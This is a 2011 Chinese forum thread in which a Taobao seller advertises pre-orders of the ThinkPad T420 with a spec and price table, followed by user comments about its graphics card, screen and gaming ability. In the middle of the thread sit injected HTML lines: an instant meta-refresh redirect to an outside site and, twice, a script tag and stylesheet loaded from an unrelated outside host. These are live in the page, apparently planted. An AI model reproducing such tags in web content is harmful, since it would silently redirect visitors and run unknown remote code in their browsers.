开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

全国第一个用上ThinkPad T420的人是你吗?8日到货,预定展开。

型号
销售区域
CPU
主频
内存
配置
硬盘
转速
光驱
显卡
显存
屏幕
分辨率
其他配置单机价
套餐价
降幅
库存状态
T420-CTO
新加坡
i5-2410
2.30G
2G
1*2G
320G
7200转
DVDRW
Nvidia+INTEL
NVS4200+3000
1G
14.1寸宽屏
1366*768
LED背光
蓝牙/摄像头/指纹/6芯电池  7600元
  7800元
库存稳定
货源稳定
T420-CTO
新加坡
i5-2520
2.50G
2G
1*2G
320G
7200转
DVDRW
1G
14.1寸宽屏
1366*768
LED背光
蓝牙/摄像头/指纹/6芯电池  7999元
  8200元
库存稳定
货源稳定
翔意推荐
T420-CTO
524750+
新加坡
i5-2520
2.50G
4G
2*2G
500G
7200转
DVDRW
1G
14.1寸宽屏
1600*900
LED背光
蓝牙/摄像头/指纹/6芯电池  8600元
  8800元
库存稳定
货源稳定
翔意推荐

第一批货预计周五傍晚到达,首批数量不多。想成为全国第一批使用ThinkPad T420的用户吗?现在打电话联系翔意各地客服热线吧!!!

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

{:9_1124:}  终于来了 这几天就到, 赶紧预定吧.{:9_1122:}

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

终于等到了,呵呵,这是新加坡的,港版的啥时候能到?
x220什么时候到啊?
期待啊,看谁先出手记~~~~要多写点使用感受分享啊!!
給力啊
到货会做评测。港版目前没消息。X220预计一个月后。
最纠结的就是这个显卡了,怎么还是64BIT的  虽然不怎么玩游戏,但还是希望显卡能更给力点啊。还是等买本的大大们的评价再决定吧
说来就来了啊
这个显卡是1G的??
很nb了吧
价格也不贵呀
蛋疼儿的16:9果然来了,以后慢慢适应吧
是1G显存的没错,但是是64位的啊,根本发挥不出1G显存的优势。。。当然显存大对作图还是有用的
不知道5.1左右货紧张不,准备5.1左右入手
黑色幽默 发表于 2011-4-6 15:13
是1G显存的没错,但是是64位的啊,根本发挥不出1G显存的优势。。。当然显存大对作图还是有用的 ...

你的意思是说,显存很高,但64位很鸡肋?
那多少合适?
黑色幽默 发表于 2011-4-6 15:16
不知道5.1左右货紧张不,准备5.1左右入手

估计以后货越来越多了~~~
别着急,路还长着呢
有啥优势呀,相比410
回复 admini 的帖子

一般来说,64位的显卡256M的显存就够了,128位的需要512M显存,当然显存还是越大越好,不过位宽会限制显存的作用。420的显卡据说大概相当于GT520级别的显卡,属于中低端独显,不过估计做了专业显卡的优化,不知道实际使用中的效果怎么样
很看好8K6那款啊 大分辨率我喜欢
上海店同步到货,欢迎预定。
同意ls的 有米就选高分屏, 要不16:9的屏幕就更杯具了...
黑色幽默 发表于 2011-4-6 15:32

一般来说,64位的显卡256M的显存就够了,128位的需要512M显存,当然显存还是越大越好 ...

哎,现在的游戏都玩不转了。。。

COD7,孤岛2啥的就别想了,对我来说,能开个高点的效果流畅运行魔兽世界,NBA2K11啥的就够了,反正平时玩的时间也少
呵呵,据说孤岛2,配置越高越卡
我下载了一个,不知道T400的显卡能玩不
COD7据说不错,哎,整个台式机玩玩吧
feixue0801 发表于 2011-4-6 15:26
有啥优势呀,相比410

升了一级~~~
现在这种游戏就得台式机玩了,就Y470那配置玩孤岛2也才30帧左右